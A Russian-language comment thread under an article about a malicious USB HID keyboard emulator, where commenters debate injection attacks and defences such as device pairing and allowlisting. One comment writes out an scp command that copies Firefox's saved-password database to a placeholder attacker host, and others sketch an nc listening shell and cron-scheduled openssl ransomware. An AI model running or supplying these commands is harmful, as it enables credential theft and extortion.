Comments 14
Лучше бы не блокнот показали, а выполнение скрипта.
С ужасом представляю себе, как эта штука запускается под приличной ОС. Ни cmd.exe, ни павершелла. Судо требует либо пальчик на фингерпринт-ридере, либо пароль…
UAC тоже может спросить пароль
Microsoft Way: 2 Пользователя. 1 — Админ, 2- Обычный юзер.
Работаем под 2, при необходимости повышения привелегий вводим лог анд пасс от 1. Необходимое приложение запустится от пользователя 1.
Работаем под 2, при необходимости повышения привелегий вводим лог анд пасс от 1. Необходимое приложение запустится от пользователя 1.
Alt+F2
xterm
scp .mozilla/firefox/*/signons.sqlite bad.guy@somewhere:
xterm
scp .mozilla/firefox/*/signons.sqlite bad.guy@somewhere:
А в ответ он пальчик просит для ключа… Вот незадача.
На что именно? scp? Ок, по ftp.
А вот это да, проблема. За вычетом того, что у меня на машине xterm'а нет, а так да, проблема.
А, вспомнил. Кейринг-то, в т.ч. и у iceweasel, тоже зашифрован. Так что нет. Хотя документы упереть, да, можно. И шелл запустить из чего-то типа nc в режиме listen тоже можно.
А, вспомнил. Кейринг-то, в т.ч. и у iceweasel, тоже зашифрован. Так что нет. Хотя документы упереть, да, можно. И шелл запустить из чего-то типа nc в режиме listen тоже можно.
А можно ещё документы зашифровать каким-нибудь openssl и после
xdg-open badguy/hello
Где будет написано «заплатите мне 1000$, чтоб я вам выслал ключ дешифровки»
И можно даже не сразу это сделать, а поставить задачу в крон.
USB HID реально большая дыра, даже на правильных ОС.
В идеале должен быть pairing. ОС при обнаружении новой клавы показывает окошко с последовательностью символов, которую нужно нажать, чтоб клава считалась доверенной.
xdg-open badguy/hello
Где будет написано «заплатите мне 1000$, чтоб я вам выслал ключ дешифровки»
И можно даже не сразу это сделать, а поставить задачу в крон.
USB HID реально большая дыра, даже на правильных ОС.
В идеале должен быть pairing. ОС при обнаружении новой клавы показывает окошко с последовательностью символов, которую нужно нажать, чтоб клава считалась доверенной.
Ну вот этим современного человека не устрашить. Я сейчас прикинул — если я лишусь ~ на ноуте, то там будет ошмёток презентации, сейв от игрушки, столь любимые конфиги к софту — … и всё. Всё остальное на серверах. Либо СЭД, либо гиты, либо прочие корпоративные системы.
ЗЫ А параноикам нужно просто разрешить HID'ы в X-сервере по списку, а не все подряд.
ЗЫ А параноикам нужно просто разрешить HID'ы в X-сервере по списку, а не все подряд.
для повышения привилегий в windows тоже требуется пароль.
Sign up to leave a comment.
Evil USB HID-эмулятор или просто Peensy